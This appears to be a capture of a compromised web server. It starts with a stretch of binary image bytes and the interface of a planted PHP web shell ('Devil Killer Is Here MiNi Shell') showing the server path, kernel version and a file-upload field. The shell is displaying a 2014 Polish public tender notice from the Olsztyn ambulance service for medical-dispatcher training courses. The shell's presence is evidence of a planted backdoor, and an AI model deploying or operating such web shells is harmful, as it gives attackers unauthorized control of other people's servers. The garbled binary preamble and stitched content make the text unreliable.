JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140109/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140109/5175-N-2014.html

<p class="kh_header"><b>Olsztyn: ZP4/2014 Przeprowadzenie zajęć teoretycznych, praktycznych i egzaminu w ramach realizacji dwóch edycji kursu doskonalącego dla dyspozytorów medycznych w roku 2014 w województwie podlaskim i warmińsko-mazurskim w oparciu o opracowane przez siebie treści, zgodne z Programem kursu doskonalącego dla dyspozytorów medycznych w ramach doskonalenia zawodowego</b><br>
<b>Numer ogłoszenia: 5175 - 2014; data zamieszczenia: 09.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzka Stacja Pogotowia Ratunkowego , ul. Pstrowskiego 28B, 10-602 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5392727, faks 089 5392710.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pogotowie.olsztyn.sisco.info/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP4/2014 Przeprowadzenie zajęć teoretycznych, praktycznych i egzaminu w ramach realizacji dwóch edycji kursu doskonalącego dla dyspozytorów medycznych w roku 2014 w województwie podlaskim i warmińsko-mazurskim w oparciu o opracowane przez siebie treści, zgodne z Programem kursu doskonalącego dla dyspozytorów medycznych w ramach doskonalenia zawodowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie zajęć teoretycznych, praktycznych i egzaminu w ramach realizacji dwóch edycji kursu doskonalącego dla dyspozytorów medycznych w roku 2014 w województwie podlaskim (kurs nr 1) i warmińsko-mazurskim (kurs nr 2).

Przedmiot zamówienia został podzielony na 3 części: 
Cześć nr 1 (kurs nr 1 i 2) - maksymalnie 110 godz. tj.
Przedmiotem zamówienia jest przeprowadzenie zajęć teoretycznych, praktycznych i egzaminu zaliczającego o tematyce: systemy ratownictwa medycznego, jednostki współpracujące z systemem, podstawy prawne współdziałania z jednostkami współpracującymi z systemem, organizacja systemu powiadamiania, zasady i procedury przyjmowania wezwań oraz dysponowania zespołami RM, zasady zbierania wywiadu medycznego, wybrane zagadnienia z medycyny ratunkowej niezbędne do realizacji zadań dyspozytora medycznego, zasady komunikacji i postępowania dyspozytora medycznego z osobami z zaburzeniami psychosomatycznymi, z dziećmi, z osobami o utrudnionym kontakcie; zasady udzielania pierwszej pomocy, zasady współpracy z LPR, zasady korzystania ze środków łączności i sprzętu do nawigacji satelitarnej, zasady czytania i analiza map, zasady postępowania w przypadku zdarzeń masowych i katastrof, zasady koordynacji działań ratowniczych na poziomie województwa, sytuacja pozorowane, udział w egzaminie końcowym.
Przedmiot zamówienia należy wykonać w oparciu o opracowane przez siebie treści, zgodne z Programem kursu doskonalącego dla dyspozytorów medycznych w ramach doskonalenia zawodowego - stanowiącego załącznik nr 1B do umowy wykonawczej NR ZP-1092/2/13/UE zawartej w dniu 11.12.2013 r. w Warszawie z projektu systemowego pn.: Wsparcie systemu ratownictwa medycznego poprzez kształcenie zawodowe lekarzy, ratowników medycznych i dyspozytorów medycznych współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.

Cześć nr 2 (kurs nr 1 i 2) - maksymalnie 80 godz. tj.
Przedmiotem zamówienia jest przeprowadzenie zajęć teoretycznych, praktycznych i egzaminu zaliczającego o tematyce: zasady i procedury przyjmowania wezwań oraz dysponowania zespołami RM, zasady zbierania wywiadu medycznego, wybrane zagadnienia z medycyny ratunkowej niezbędne do realizacji zadań dyspozytora medycznego, zasady komunikacji i postępowania dyspozytora medycznego z osobami z zaburzeniami psychosomatycznymi, z dziećmi, z osobami o utrudnionym kontakcie; zasady udzielania pierwszej pomocy, zasady czytania i analiza map, zasady postępowania w przypadku katastrof naturalnych, zasady postępowania w przypadku zdarzeń masowych i katastrof, zasady koordynacji działań ratowniczych na poziomie województwa, zadania lekarza koordynatora ratownictwa medycznego, sytuacja pozorowane, udział w egzaminie końcowym.
Przedmiot zamówienia należy wykonać w oparciu o opracowane przez siebie treści, zgodne z Programem kursu doskonalącego dla dyspozytorów medycznych w ramach doskonalenia zawodowego - stanowiącego załącznik nr 1B do umowy wykonawczej NR ZP-1092/2/13/UE zawartej w dniu 11.12.2013 r. w Warszawie z projektu systemowego pn.: Wsparcie systemu ratownictwa medycznego poprzez kształcenie zawodowe lekarzy, ratowników medycznych i dyspozytorów medycznych współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.

Cześć nr 3 (kurs nr 1 ) - maksymalnie 5 godz. tj.
Przedmiotem zamówienia jest przeprowadzenie zajęć teoretycznych, praktycznych i egzaminu zaliczającego o tematyce: wsparcie psychologiczne dla dyspozytora.

Przedmiot zamówienia należy wykonać w oparciu o opracowane przez siebie treści, zgodne z Programem kursu doskonalącego dla dyspozytorów medycznych w ramach doskonalenia zawodowego - stanowiącego załącznik nr 1B do umowy wykonawczej NR ZP-1092/2/13/UE zawartej w dniu 11.12.2013r. w Warszawie z projektu systemowego pn.: Wsparcie systemu ratownictwa medycznego poprzez kształcenie zawodowe lekarzy, ratowników medycznych i dyspozytorów medycznych współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego stanowiącym Załącznik nr 10 do niniejszej SIWZ.

Miejsce świadczenia usługi:
a) kurs nr 1 - Województwo Podlaskie, miasto Augustów lub okolice maksymalnie do 25 km od miasta Augustów, dokładny adres zostanie wskazany przez Zamawiającego minimum 7 dni przed rozpoczęciem kursu.
b) kurs nr 2 - Warmińsko - Mazurska Szkoła Ratownictwa Medycznego w Wojewódzkiej Stacji Pogotowia Ratunkowego w Olsztynie, ul. Pstrowskiego 28 B, Olsztyn. 

Termin wykonania zamówienia:
Przedmiot zamówienia zostanie realizowany w okresie od dnia 24 lutego 2014 r. do dnia 12 grudnia 2014 r., zgodnie Harmonogramem dla poszczególnych części przedstawionym w Załączniku nr 1 do SIWZ ZP4/2014.
Zamawiający zastrzega sobie możliwość odwołania kursu lub zmiany harmonogramu w trakcie trwania usługi, jednakże o każdym odwołaniu czy zmianie Zamawiający poinformuje Wykonawcę nie później niż 5 dni przed planowaną usługą..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu, zgodnie z Rozdziałem XI SIWZ, metodą warunku granicznego: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu, zgodnie z Rozdziałem XI SIWZ, metodą warunku granicznego: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu, zgodnie z Rozdziałem XI SIWZ, metodą warunku granicznego: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tj. dysponowanie przynajmniej jedną osobą będącą: 
W zakresie część nr 1 oraz 2:
dysponowanie minimum jedną osobą będącą:
a) lekarzem systemu - lekarz posiadający tytuł specjalisty w dziedzinie medycyny ratunkowej albo lekarz, który ukończył co najmniej drugi rok specjalizacji w dziedzinie medycyny ratunkowej lub lekarz posiadający:
1) specjalizację lub tytuł specjalisty albo który ukończył co najmniej drugi rok specjalizacji w dziedzinie: anestezjologii i intensywnej terapii, chorób wewnętrznych, chirurgii ogólnej, chirurgii dziecięcej, ortopedii i traumatologii narządu ruchu, ortopedii i traumatologii lub pediatrii albo 
2) 3000 godzin w wykonywaniu zawodu lekarza w szpitalnym oddziale ratunkowym, zespole ratownictwa medycznego, lotniczym zespole ratownictwa medycznego lub izbie przyjęć szpitala,
lub
b) pielęgniarką systemu - pielęgniarką posiadającą tytuł specjalisty lub specjalizująca się dziedzinie pielęgniarstwa ratunkowego, anestezjologii, i intensywnej opieki, chirurgii, kardiologii, pediatrii a także pielęgniarką posiadająca ukończony kurs kwalifikacyjny w dziedzinie pielęgniarstwa ratunkowego, anestezjologii, i intensywnej opieki, chirurgii, kardiologii, pediatrii oraz posiadającą minimum 3 letni staż pracy w oddziałach pomocy doraźnej, izbach przyjęć lub pogotowiu ratunkowym, 
lub
c) ratownikiem medycznym- posiadającym wykształcenie zgodnie z art. 10 ust. 4 ustawy o Państwowym Ratownictwie Medycznym z dn. 08.09.2006 roku z późn. zm. 
Wszystkie wymienione wyżej osoby muszą posiadać minimum 5 letnie doświadczenie w wykonywaniu medycznych czynności ratunkowych (świadczenia opieki zdrowotnej wykonywane przez zespoły ratownictwa medycznego - pogotowie ratunkowe lub lotnicze zespoły ratownictwa medycznego) oraz doświadczenie w prowadzeniu wykładów i ćwiczeń z zakresu ratownictwa minimum 100 godz. dydaktycznych (godz. dydakt. 45 min.) w okresie ostatnich 3 lat (liczone od daty składania ofert).
W zakresie część nr 3:
dysponowanie minimum jedną osobą będącą:
a) psychologiem - posiadającym ukończone studia magisterskie na kierunku psychologia, posiadającym minimum 3 lata doświadczenia zawodowego oraz posiadającym doświadczenie w prowadzeniu wykładów i ćwiczeń, minimum 100 godz. dydakt. (godz. dydakt. 45 min.) w okresie ostatnich 3 lat (liczone od daty składania ofert).
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu, zgodnie z Rozdziałem XI SIWZ, metodą warunku granicznego: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu, zgodnie z Rozdziałem XI SIWZ, metodą warunku granicznego: spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą. Treść pełnomocnictwa musi jednoznacznie określać czynności, co do wykonywania których pełnomocnik jest upoważniony. Pełnomocnictwo zgodnie z działem VI rozdział II ustawy z dnia 23 kwietnia 1964 r. - Kodeks cywilny (Dz. U. Nr 16, poz. 93 z późn. zm.) winno być złożone w formie oryginału lub kopii poświadczonej notarialnie,
Pełnomocnictwo do reprezentowania wszystkich Wykonawców w przypadku wspólnego ubiegania się o zamówienie kilku Wykonawców, zgodnie z art. 23 ustawy Pzp. Pełnomocnictwo zgodnie z działem VI rozdział II ustawy z dnia 23 kwietnia 1964 r. - Kodeks cywilny(Dz. U. Nr 16, poz. 93 z późn. zm.) winno być złożone w formie oryginału lub kopii poświadczonej notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień umowy w stosunku do treści oferty Wykonawcy jest możliwa poprzez zmianę sposobu wykonania przedmiotu umowy w przypadku:
a) Nastąpiła zmiana podwykonawcy oraz zakresu realizacji zamówienia przez podwykonawcę.     
b) Zmiany spowodowane wzrostem albo zmniejszeniem stawki VAT. Jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów towarów po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia Wykonawcy o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez Wykonawcę. Jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów towarów po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT zapłaconego przez Wykonawcę,
c) Zmiany terminu realizacji umowy, ze względu na wystąpienie okoliczności nie dających się przewidzieć przed zawarciem umowy, np. działanie siły wyższej, 
d) Zmiany terminu realizacji umowy, ze względu na wystąpienie okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności.
e) zmiany miejsca przeprowadzania wykładów i ćwiczeń.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pogotowie.olsztyn.sisco.info/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzka Stacja Pogotowia Ratunkowego w Olsztynie 
ul. Pstrowskiego 28 B
10-602 Olsztyn Pokój nr 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.01.2014 godzina 09:15, miejsce: Wojewódzka Stacja Pogotowia Ratunkowego w Olsztynie 
ul. Pstrowskiego 28 B
10-602 Olsztyn Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia należy wykonać w oparciu o opracowane przez siebie treści, zgodne z Programem kursu doskonalącego dla dyspozytorów medycznych w ramach doskonalenia zawodowego - stanowiącego załącznik nr 1B do umowy wykonawczej NR ZP-1092/2/13/UE zawartej w dniu 11.12.2013 r. w Warszawie z projektu systemowego pn.: Wsparcie systemu ratownictwa medycznego poprzez kształcenie zawodowe lekarzy, ratowników medycznych i dyspozytorów medycznych współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Cześć nr 1 (kurs nr 1 i 2) - maksymalnie 110 godz..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cześć nr 1 (kurs nr 1 i 2) - maksymalnie 110 godz. tj.
Przedmiotem zamówienia jest przeprowadzenie zajęć teoretycznych, praktycznych i egzaminu zaliczającego o tematyce: systemy ratownictwa medycznego, jednostki współpracujące z systemem, podstawy prawne współdziałania z jednostkami współpracującymi z systemem, organizacja systemu powiadamiania, zasady i procedury przyjmowania wezwań oraz dysponowania zespołami RM, zasady zbierania wywiadu medycznego, wybrane zagadnienia z medycyny ratunkowej niezbędne do realizacji zadań dyspozytora medycznego, zasady komunikacji i postępowania dyspozytora medycznego z osobami z zaburzeniami psychosomatycznymi, z dziećmi, z osobami o utrudnionym kontakcie; zasady udzielania pierwszej pomocy, zasady współpracy z LPR, zasady korzystania ze środków łączności i sprzętu do nawigacji satelitarnej, zasady czytania i analiza map, zasady postępowania w przypadku zdarzeń masowych i katastrof, zasady koordynacji działań ratowniczych na poziomie województwa, sytuacja pozorowane, udział w egzaminie końcowym.
Przedmiot zamówienia należy wykonać w oparciu o opracowane przez siebie treści, zgodne z Programem kursu doskonalącego dla dyspozytorów medycznych w ramach doskonalenia zawodowego - stanowiącego załącznik nr 1B do umowy wykonawczej NR ZP-1092/2/13/UE zawartej w dniu 11.12.2013 r. w Warszawie z projektu systemowego pn.: Wsparcie systemu ratownictwa medycznego poprzez kształcenie zawodowe lekarzy, ratowników medycznych i dyspozytorów medycznych współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Cześć nr 2 (kurs nr 1 i 2) - maksymalnie 80 godz..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cześć nr 2 (kurs nr 1 i 2) - maksymalnie 80 godz. tj.
Przedmiotem zamówienia jest przeprowadzenie zajęć teoretycznych, praktycznych i egzaminu zaliczającego o tematyce: zasady i procedury przyjmowania wezwań oraz dysponowania zespołami RM, zasady zbierania wywiadu medycznego, wybrane zagadnienia z medycyny ratunkowej niezbędne do realizacji zadań dyspozytora medycznego, zasady komunikacji i postępowania dyspozytora medycznego z osobami z zaburzeniami psychosomatycznymi, z dziećmi, z osobami o utrudnionym kontakcie; zasady udzielania pierwszej pomocy, zasady czytania i analiza map, zasady postępowania w przypadku katastrof naturalnych, zasady postępowania w przypadku zdarzeń masowych i katastrof, zasady koordynacji działań ratowniczych na poziomie województwa, zadania lekarza koordynatora ratownictwa medycznego, sytuacja pozorowane, udział w egzaminie końcowym.
Przedmiot zamówienia należy wykonać w oparciu o opracowane przez siebie treści, zgodne z Programem kursu doskonalącego dla dyspozytorów medycznych w ramach doskonalenia zawodowego - stanowiącego załącznik nr 1B do umowy wykonawczej NR ZP-1092/2/13/UE zawartej w dniu 11.12.2013 r. w Warszawie z projektu systemowego pn.: Wsparcie systemu ratownictwa medycznego poprzez kształcenie zawodowe lekarzy, ratowników medycznych i dyspozytorów medycznych współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
